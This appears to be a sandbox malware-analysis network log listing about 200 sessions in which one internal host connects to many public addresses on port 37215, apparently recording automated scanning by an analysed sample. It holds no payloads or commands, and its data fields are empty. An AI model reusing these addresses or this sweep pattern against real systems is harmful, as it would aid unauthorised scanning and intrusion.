                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17342192.168.2.153313841.136.49.6937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17343192.168.2.154451641.202.178.18337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17344192.168.2.155970241.139.176.2637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17345192.168.2.154194441.119.100.11737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17346192.168.2.154122041.176.157.7637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17347192.168.2.155010641.51.124.8037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17348192.168.2.155636441.173.180.6537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17349192.168.2.154645041.92.137.10937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17350192.168.2.154475041.243.61.6037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17351192.168.2.154432641.33.213.22337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17352192.168.2.153576041.149.236.037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17353192.168.2.154562241.107.63.22037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17354192.168.2.154972441.62.212.537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17355192.168.2.154984241.225.175.14537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17356192.168.2.155434441.10.25.12737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17357192.168.2.154944441.143.153.24737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17358192.168.2.154165641.68.13.11237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17359192.168.2.154669041.35.198.22137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17360192.168.2.154640041.153.57.11737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17361192.168.2.154488641.151.70.23037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17362192.168.2.155999041.148.139.5737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17363192.168.2.153981241.38.112.12237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17364192.168.2.155199841.252.159.14437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17365192.168.2.153884441.188.170.10137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17366192.168.2.153642041.87.247.19637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17367192.168.2.155134841.193.86.3337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17368192.168.2.154814241.217.246.24937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17369192.168.2.155734841.207.184.1337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17370192.168.2.155106641.123.40.25537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17371192.168.2.154781041.255.217.21237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17372192.168.2.155824441.180.4.16837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17373192.168.2.155550641.183.203.8537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17374192.168.2.153396241.238.53.22437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17375192.168.2.155406441.161.215.23737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17376192.168.2.154457441.172.160.2237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17377192.168.2.155006041.210.19.4637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17378192.168.2.154350041.237.121.1937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17379192.168.2.155927241.197.178.2437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17380192.168.2.155948041.30.148.1937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17381192.168.2.154826641.182.5.13037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17382192.168.2.154293641.167.225.2537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17383192.168.2.156047241.246.225.13737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17384192.168.2.153359841.59.93.10837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17385192.168.2.153947241.161.182.5737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17386192.168.2.154972641.71.39.5637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17387192.168.2.155548641.109.165.6437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17388192.168.2.154415441.100.41.13437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17389192.168.2.155658841.47.107.4537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17390192.168.2.153280641.161.221.5237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17391192.168.2.155155241.72.224.12237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17392192.168.2.155173041.212.123.13137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17393192.168.2.153471841.70.68.3037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17394192.168.2.153654641.15.105.11937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17395192.168.2.153381041.237.224.21137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17396192.168.2.154264641.188.31.7037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17397192.168.2.155838441.44.21.4537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17398192.168.2.154018441.230.236.8237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17399192.168.2.154343641.41.158.10137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17400192.168.2.153590841.63.7.6537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17401192.168.2.155541041.29.226.937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17402192.168.2.153981641.167.47.23037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17403192.168.2.153570641.201.19.19037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17404192.168.2.155298041.146.233.22137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17405192.168.2.154509641.24.145.7437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17406192.168.2.155452241.182.163.23037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17407192.168.2.153294241.37.146.4137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17408192.168.2.153815441.4.11.18037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17409192.168.2.153571041.251.94.10237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17410192.168.2.153464641.89.227.12437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17411192.168.2.153394841.135.254.17837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17412192.168.2.153371441.226.129.16937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17413192.168.2.153773241.109.234.19837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17414192.168.2.153815041.171.133.21937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17415192.168.2.154819441.247.158.13237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17416192.168.2.153891841.42.1.23837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17417192.168.2.154655041.127.127.25537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17418192.168.2.153739641.254.114.537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17419192.168.2.155659241.74.169.537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17420192.168.2.155444241.176.109.11537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17421192.168.2.155752841.17.111.12537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17422192.168.2.153544241.153.50.2437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17423192.168.2.154744641.40.238.16237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17424192.168.2.154172841.28.87.5437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17425192.168.2.155151441.233.95.5937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17426192.168.2.154836441.127.27.4637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17427192.168.2.154742241.94.172.3637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17428192.168.2.153736041.123.170.6137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17429192.168.2.154911841.125.13.13837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17430192.168.2.153691041.13.172.13237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17431192.168.2.153385841.240.144.4237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17432192.168.2.154129241.81.247.1737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17433192.168.2.155185641.110.11.14337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17434192.168.2.154687841.232.249.10437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17435192.168.2.153461441.189.99.3337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17436192.168.2.154280641.66.227.18237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17437192.168.2.154344241.63.22.24137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17438192.168.2.154092241.13.37.19137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17439192.168.2.154956641.9.1.10837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17440192.168.2.155797041.239.58.15537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17441192.168.2.153760041.40.52.22137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17442192.168.2.154245241.154.2.10637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17443192.168.2.154938641.82.6.21637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17444192.168.2.155335441.58.201.10837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17445192.168.2.154848641.107.108.19537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17446192.168.2.155113641.64.77.5937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17447192.168.2.155604241.167.62.23937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17448192.168.2.154122241.34.48.8637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17449192.168.2.156072041.238.7.12537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17450192.168.2.154120441.33.101.22737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17451192.168.2.154556041.33.15.14137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17452192.168.2.153745841.153.3.6037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17453192.168.2.153407841.180.12.19537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17454192.168.2.154904041.2.136.23937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17455192.168.2.155416841.111.95.6937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17456192.168.2.156086241.251.214.13037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17457192.168.2.156040441.133.220.8637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17458192.168.2.155060041.19.43.22337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17459192.168.2.154909441.167.148.16537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17460192.168.2.155439441.169.1.1137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17461192.168.2.153530041.190.119.17737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17462192.168.2.154073441.177.197.2537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17463192.168.2.154973841.206.64.1237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17464192.168.2.154404441.166.96.6937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17465192.168.2.156009041.249.80.14737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17466192.168.2.153802841.117.17.23637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17467192.168.2.154860241.138.91.7537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17468192.168.2.153442241.49.221.5637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17469192.168.2.155724041.24.180.7737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17470192.168.2.153787041.104.120.2937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17471192.168.2.155023041.170.27.16337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17472192.168.2.155054041.99.6.16637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17473192.168.2.155462641.48.180.10137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17474192.168.2.155709241.162.165.7237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17475192.168.2.153997441.82.153.12137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17476192.168.2.153647041.149.192.12637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17477192.168.2.154709041.178.151.4037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17478192.168.2.155702641.74.247.8337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17479192.168.2.154136641.225.99.12437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17480192.168.2.153426641.252.237.23637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17481192.168.2.155939241.43.228.19037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17482192.168.2.155320441.208.97.8737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17483192.168.2.155490241.232.30.20637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17484192.168.2.154155241.124.251.24837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17485192.168.2.153285041.98.153.15537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17486192.168.2.154343041.224.6.7937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17487192.168.2.155976441.60.133.12637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17488192.168.2.154302241.214.91.10737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17489192.168.2.154079841.129.71.12137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17490192.168.2.154983441.132.247.16537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17491192.168.2.154636641.34.45.11837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17492192.168.2.155918241.191.82.14937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17493192.168.2.155960841.6.129.20737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17494192.168.2.154396241.42.159.17437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17495192.168.2.154050041.218.42.7937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17496192.168.2.153289441.150.80.8537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17497192.168.2.154889641.213.76.21837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17498192.168.2.153687841.244.215.9737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17499192.168.2.154601641.56.99.9037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17500192.168.2.154514441.196.113.20437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17501192.168.2.155734041.170.96.11537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17502192.168.2.156056841.119.9.10337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17503192.168.2.154778841.90.217.2037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17504192.168.2.156000641.84.116.17637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17505192.168.2.155189641.173.253.12537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17506192.168.2.154500241.14.187.15937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17507192.168.2.154152841.170.155.20337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17508192.168.2.154467041.65.0.14237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17509192.168.2.155677441.31.228.17037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17510192.168.2.154501441.29.167.23737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17511192.168.2.155793041.163.14.8337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17512192.168.2.154288241.187.31.24637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17513192.168.2.153412841.135.144.20737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17514192.168.2.154115041.216.32.25337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17515192.168.2.155076641.213.31.24837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17516192.168.2.154974841.102.46.5237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17517192.168.2.155710641.11.169.6437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17518192.168.2.153351641.250.210.3037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17519192.168.2.155720641.238.205.5137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17520192.168.2.154080041.11.53.23837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17521192.168.2.154267641.232.163.13037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17522192.168.2.155869041.173.194.23537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17523192.168.2.153834241.115.19.11237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17524192.168.2.154066241.13.139.21737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17525192.168.2.154910641.51.109.13537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17526192.168.2.154563441.152.166.12737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17527192.168.2.154784641.170.47.8037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17528192.168.2.154777241.50.180.18137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17529192.168.2.154432041.81.36.21337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17530192.168.2.155712841.56.66.19937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17531192.168.2.154150641.59.175.8337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17532192.168.2.153609041.33.109.9737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17533192.168.2.153442041.137.129.20237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17534192.168.2.155815441.216.151.18237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17535192.168.2.156077441.29.224.8037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17536192.168.2.1543344197.173.146.1737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17537192.168.2.1543908197.116.248.24337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17538192.168.2.1553930197.138.158.17637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17539192.168.2.1547278197.144.220.20937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17540192.168.2.1551174197.179.31.16637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17541192.168.2.1535378197.62.161.4337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17542192.168.2.1546838197.119.132.20937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17543192.168.2.1553842197.192.3.13437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
